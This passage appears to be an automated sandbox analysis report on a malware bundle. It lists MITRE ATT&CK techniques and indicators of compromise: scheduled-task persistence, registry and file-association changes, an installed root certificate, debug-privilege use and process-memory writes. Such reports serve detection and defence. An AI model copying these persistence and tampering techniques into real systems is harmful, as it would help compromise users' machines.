Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regmess.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
2720	PING.EXE
3808	PING.EXE
3240	PING.EXE
3212	PING.EXE
3504	PING.EXE
2648	PING.EXE
2148	PING.EXE
408	PING.EXE
1624	PING.EXE
2216	PING.EXE
348	PING.EXE
3140	PING.EXE
2928	PING.EXE
3212	PING.EXE
3912	PING.EXE
2024	PING.EXE
2176	PING.EXE
1104	PING.EXE

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x000500000001a4dd-226.dat	nsis_installer_1
behavioral1/files/0x000500000001a4dd-226.dat	nsis_installer_2

Delays execution with timeout.exe 4 IoCs

pid	Process
236	timeout.exe
2204	timeout.exe
2892	timeout.exe
972	timeout.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
1416	ipconfig.exe

Kills process with taskkill 5 IoCs

pid	Process
2512	taskkill.exe
3108	taskkill.exe
3140	taskkill.exe
3136	taskkill.exe
3308	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman"	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e1d0c7cbff29b647a8affc759059d6c100000000020000000000106600000001000020000000c24e88d88233a054abbd1317e850caefe240de68b8b50809ba39bd92e8a2dcdb000000000e800000000200002000000026aa4c19ae25bf7a1830f81fc720419d146e3e976751ad4bbf76868d4680e73890000000bb61d1a74763285c6069600127e304b4fa28a2caffdec77d0551935e30cf5921435f2aa88c4ba6667bf3bb2992c51155bb81d92a86872dc41e1951d19ba14cec7350477a1b21b7edf0e589e2c810f539bb90d82dad7a6e483125658bc13c0b804c1ae5ff23b06c56ea079d142f099a851fa1a9c2a778ff9dad6b9d173da1d8136ef8c314680e30b995c4edda4e9bc2d540000000c84df215569c67c72dd8b7df9443865b05ae830e8cd7e207f20a59291e212562348e7d03d8c4fdf668882f15d614c315d3532581991b021476b36d20a7151338	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEPropFontName = "Kartika"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\30\IEFixedFontName = "Microsoft Yi Baiti"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEFixedFontName = "MV Boli"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\24\IEPropFontName = "MS PGothic"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEPropFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\19\IEFixedFontName = "Cordia New"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFixedFontName = "NSimsun"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\32\IEPropFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEPropFontName = "Gulim"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\31\IEPropFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\8\IEFixedFontName = "Courier New"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38	reg.exe

Modifies registry class 25 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\py_auto_file\shell\Read\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\.json	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\json_auto_file\shell\Read\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\json_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\py_auto_file\	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\psiphon\ = "URL:psiphon"	3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\\bloatware\\3.exe\" -- \"%1\""	3.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\json_auto_file\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\.py	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\py_auto_file\shell\Read	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\py_auto_file\shell	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\psiphon	3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\psiphon\URL Protocol	3.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\psiphon\shell\open\command	3.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\psiphon\shell\open	3.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_Classes\Local Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\json_auto_file\	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\.py\ = "py_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\psiphon\shell	3.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\json_auto_file	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\.json\ = "json_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\json_auto_file\shell\Read	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\py_auto_file	rundll32.exe

Modifies system certificate store 2 TTPs 2 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	psiphon-tunnel-core.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	psiphon-tunnel-core.exe

Runs net.exe

Runs ping.exe 1 TTPs 18 IoCs

Remote System Discovery

T1018

pid	Process
2024	PING.EXE
3912	PING.EXE
1624	PING.EXE
3140	PING.EXE
3240	PING.EXE
3212	PING.EXE
3212	PING.EXE
1104	PING.EXE
408	PING.EXE
2720	PING.EXE
2216	PING.EXE
348	PING.EXE
3808	PING.EXE
2928	PING.EXE
3504	PING.EXE
2648	PING.EXE
2148	PING.EXE
2176	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2416	schtasks.exe
3432	schtasks.exe
3928	schtasks.exe
3504	schtasks.exe
3508	schtasks.exe
992	schtasks.exe
3804	schtasks.exe
3532	schtasks.exe
2420	schtasks.exe
3528	schtasks.exe
2972	schtasks.exe
2732	schtasks.exe
3468	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3236	vlc.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1932	WinaeroTweaker-1.40.0.0-setup.tmp
1932	WinaeroTweaker-1.40.0.0-setup.tmp
2852	powershell.exe
2204	powershell.exe
2096	iexplore.exe
2096	iexplore.exe
2096	iexplore.exe
2096	iexplore.exe
2096	iexplore.exe
2096	iexplore.exe
2096	iexplore.exe
2096	iexplore.exe
2096	iexplore.exe
2096	iexplore.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3932	ac3.exe
3236	vlc.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	2228	tasklist.exe
Token: SeDebugPrivilege	2512	taskkill.exe
Token: SeDebugPrivilege	2000	Rover.exe
Token: SeDebugPrivilege	3108	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	3136	taskkill.exe
Token: SeDebugPrivilege	2832	scary.exe
Token: SeDebugPrivilege	1728	Romilyaa.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	3340	Romilyaa.exe
Token: SeDebugPrivilege	2700	Romilyaa.exe
Token: SeDebugPrivilege	2236	Romilyaa.exe
Token: SeDebugPrivilege	280	Romilyaa.exe
Token: SeDebugPrivilege	3308	taskkill.exe
Token: SeDebugPrivilege	4084	SolaraBootstrapper.exe
Token: SeDebugPrivilege	2692	Umbral.exe
Token: SeDebugPrivilege	3380	Romilyaa.exe
Token: SeDebugPrivilege	2564	Romilyaa.exe
Token: SeDebugPrivilege	1972	!FIXInj.exe
Token: 33	1972	!FIXInj.exe
Token: SeIncBasePriorityPrivilege	1972	!FIXInj.exe
Token: 33	1972	!FIXInj.exe
Token: SeIncBasePriorityPrivilege	1972	!FIXInj.exe
Token: SeDebugPrivilege	3168	Romilyaa.exe
Token: 33	1972	!FIXInj.exe
Token: SeIncBasePriorityPrivilege	1972	!FIXInj.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	3044	Romilyaa.exe
Token: 33	1972	!FIXInj.exe
Token: SeIncBasePriorityPrivilege	1972	!FIXInj.exe
Token: SeDebugPrivilege	3176	Romilyaa.exe
Token: 33	1972	!FIXInj.exe
Token: SeIncBasePriorityPrivilege	1972	!FIXInj.exe
Token: SeDebugPrivilege	2944	Romilyaa.exe
Token: 33	1972	!FIXInj.exe
Token: SeIncBasePriorityPrivilege	1972	!FIXInj.exe
Token: 33	1972	!FIXInj.exe
Token: SeIncBasePriorityPrivilege	1972	!FIXInj.exe
Token: SeDebugPrivilege	3464	Romilyaa.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
2668	iexplore.exe
2872	efsui.exe
2872	efsui.exe
2872	efsui.exe
2096	iexplore.exe
1932	WinaeroTweaker-1.40.0.0-setup.tmp
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2096	iexplore.exe
1728	Romilyaa.exe
3340	Romilyaa.exe
2700	Romilyaa.exe
2236	Romilyaa.exe
280	Romilyaa.exe
3380	Romilyaa.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
2564	Romilyaa.exe
3168	Romilyaa.exe
3044	Romilyaa.exe
3176	Romilyaa.exe
2944	Romilyaa.exe
3940	f3cb220f1aaa32ca310586e5f62dcab1.exe
3940	f3cb220f1aaa32ca310586e5f62dcab1.exe
3940	f3cb220f1aaa32ca310586e5f62dcab1.exe
3464	Romilyaa.exe

Suspicious use of SendNotifyMessage 39 IoCs

pid	Process
2872	efsui.exe
2872	efsui.exe
2872	efsui.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
2432	3.exe
1728	Romilyaa.exe
3340	Romilyaa.exe
2700	Romilyaa.exe
2236	Romilyaa.exe
280	Romilyaa.exe
3380	Romilyaa.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
3236	vlc.exe
2564	Romilyaa.exe
3168	Romilyaa.exe
3044	Romilyaa.exe
3176	Romilyaa.exe
2944	Romilyaa.exe
3940	f3cb220f1aaa32ca310586e5f62dcab1.exe
3940	f3cb220f1aaa32ca310586e5f62dcab1.exe
3940	f3cb220f1aaa32ca310586e5f62dcab1.exe
3464	Romilyaa.exe

Suspicious use of SetWindowsHookEx 27 IoCs

pid	Process
2668	iexplore.exe
2668	iexplore.exe
2744	IEXPLORE.EXE
2744	IEXPLORE.EXE
2096	iexplore.exe
2096	iexplore.exe
332	IEXPLORE.EXE
332	IEXPLORE.EXE
2432	3.exe
2432	3.exe
2096	iexplore.exe
2096	iexplore.exe
2844	IEXPLORE.EXE
2844	IEXPLORE.EXE
1728	Romilyaa.exe
2844	IEXPLORE.EXE
2844	IEXPLORE.EXE
3296	IEXPLORE.EXE
3296	IEXPLORE.EXE
3236	vlc.exe
2564	Romilyaa.exe
332	IEXPLORE.EXE
332	IEXPLORE.EXE
3296	IEXPLORE.EXE
3296	IEXPLORE.EXE
332	IEXPLORE.EXE
332	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2516 wrote to memory of 1668	2516	vir.exe	30
PID 2516 wrote to memory of 1668	2516	vir.exe	30
PID 2516 wrote to memory of 1668	2516	vir.exe	30
PID 2516 wrote to memory of 1668	2516	vir.exe	30
PID 1668 wrote to memory of 1664	1668	cmd.exe	32
PID 1668 wrote to memory of 1664	1668	cmd.exe	32
PID 1668 wrote to memory of 1664	1668	cmd.exe	32
PID 1668 wrote to memory of 1664	1668	cmd.exe	32
PID 1668 wrote to memory of 2340	1668	cmd.exe	33
PID 1668 wrote to memory of 2340	1668	cmd.exe	33
PID 1668 wrote to memory of 2340	1668	cmd.exe	33
PID 1668 wrote to memory of 2340	1668	cmd.exe	33
PID 1668 wrote to memory of 1624	1668	cmd.exe	36
PID 1668 wrote to memory of 1624	1668	cmd.exe	36
PID 1668 wrote to memory of 1624	1668	cmd.exe	36
PID 1668 wrote to memory of 1624	1668	cmd.exe	36
PID 2340 wrote to memory of 1416	2340	cmd.exe	37
PID 2340 wrote to memory of 1416	2340	cmd.exe	37
PID 2340 wrote to memory of 1416	2340	cmd.exe	37
PID 2340 wrote to memory of 1416	2340	cmd.exe	37
PID 1664 wrote to memory of 2824	1664	cmd.exe	38
PID 1664 wrote to memory of 2824	1664	cmd.exe	38
PID 1664 wrote to memory of 2824	1664	cmd.exe	38
PID 1664 wrote to memory of 2824	1664	cmd.exe	38
PID 2340 wrote to memory of 2984	2340	cmd.exe	39
PID 2340 wrote to memory of 2984	2340	cmd.exe	39
PID 2340 wrote to memory of 2984	2340	cmd.exe	39
